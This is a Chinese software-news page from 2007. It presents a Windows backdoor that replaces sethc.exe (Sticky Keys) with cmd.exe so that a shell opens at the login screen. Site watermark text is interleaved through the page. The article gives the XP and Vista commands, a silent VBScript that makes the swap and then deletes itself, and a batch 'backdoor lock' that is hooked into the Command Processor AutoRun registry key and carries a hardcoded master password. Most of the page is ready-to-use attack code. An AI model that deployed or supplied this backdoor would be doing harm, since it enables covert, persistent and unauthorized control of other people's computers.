·软件主站    ·霏凡论坛    ·电影BT    ·绿色软件专栏    ·广告联系     
金山wps
 >加入收藏 >意见留言 >联系我们
    会员登录         投递文章
资讯首页  |  软件资讯  |  业界新闻  |  安全相关  |  硬件资讯  |  游戏报道     
  最新推荐:
   [软件]网际快车(FlashGet) 2.0 正式版   [软件]GPU-Z 0.1.9 发布   [软件]PPS网络电视(PPStream) 2.2.30.1100 发布   [软件]暴风影音3.4 3.08.03.15   [软件]eMule 0.48a VeryCD 080307 发布下载   腾讯TM2008 Preview4   [软件]世界之窗2.0.6.6最终正式版   [软件]风暴播放器Storm Player 1.0.7   [软件]Firefox 3 Beta 1   [软件]腾讯TM2008 Preview3  
 您的位置:首页 > 安全相关 > 变态入侵:有史以来最酷的Windows后门
【收藏】 】【打印】【关闭
在线评论:

变态入侵:有史以来最酷的Windows后门
[ 来源:51cto ] [ 作者: ][ 时间:2007-11-21 ]
    后门原理: bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
XP: bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
将安装源光盘弹出(或将硬盘上的安装目录改名) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
cd %widnir%\system32\dllcache bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
ren sethc.exe *.ex~ bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
cd %widnir%\system32 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
copy /y cmd.exe sethc.exe bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
VISTA: bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
takeown /f c:\windows\system32\sethc.exe bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
cacls c:\windows\system32\sethc.exe /G administrator:F bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
然后按XP方法替换文件 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
在登录界面按5此SHIFT,出来cmd shell,然后…… bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
后门扩展: bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Dim obj, success bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set obj = CreateObject("WScript.Shell") bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
第二句最有意思了.自动应答....以前就遇到过类似的问题 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
再更新.加个自删除,简化代码... bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
On Error Resume Next bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Dim obj, success bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set obj = CreateObject("WScript.Shell") bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
后门锁扩展: bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
用下面的后门锁的方法是 把代码保存为bdlock.bat bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
然后修改注册表位置即可 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor] bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
"AutoRun"="bdlock.bat" bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
@Echo Off bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
title 后门登陆验证 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
color a bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
cls bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
set temprandom=%RANDOM% bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
echo 请输入验证码:%temprandom% bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
set/p check= bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
if "%check%"=="%temprandom%%temprandom%" goto passcheck bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
if "%check%"=="%temprandom%" ( bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
rem 后门服务器验证 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
rem 如果没有后门验证服务器请rem注释掉下一行代码 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
if exist \192.168.8.8\backdoor$\pass goto passcheck bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
) bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
echo 验证失败 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
pause bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
exit bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
:passcheck bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
echo 验证成功 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set passcmdlock=http://blog.csdn.net/freexploit/ bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
:allyesno bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set Errorlevel=>nul bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Echo 请输入验证密码? bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set password=allyesno Is a pig>nul bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set/p password= bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
rem 万能密码 bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
if "%password%"=="allyesno is a sb" goto endx bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==0 Set timechange=a bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==1 Set timechange=b bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==2 Set timechange=c bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==3 Set timechange=d bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==4 Set timechange=e bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==5 Set timechange=f bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==6 Set timechange=g bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==7 Set timechange=h bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==8 Set timechange=i bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If %time:~1,1%==9 Set timechange=j bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
set/a sum=%time:~1,1%+%time:~1,1% bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Echo 请联系客服咨询正确密码!&Goto allyesno bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
:End bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set password=>nul bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Set Errorlevel=>nul bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
Echo bDW霏凡软件站> 资讯中心
bDW霏凡软件站> 资讯中心
:endx

发布者:飞天  责任编辑: 飞天   
 
    ·在线评论
金山毒霸
相关文章
热点文章
最新评论    点击查看全部评论 (共0条)

版权所有霏凡软件站 by 中国·福建 闽ICP备05000266号 Copyright(C) 1999-2006 www.crSky.Com All Rights Reserved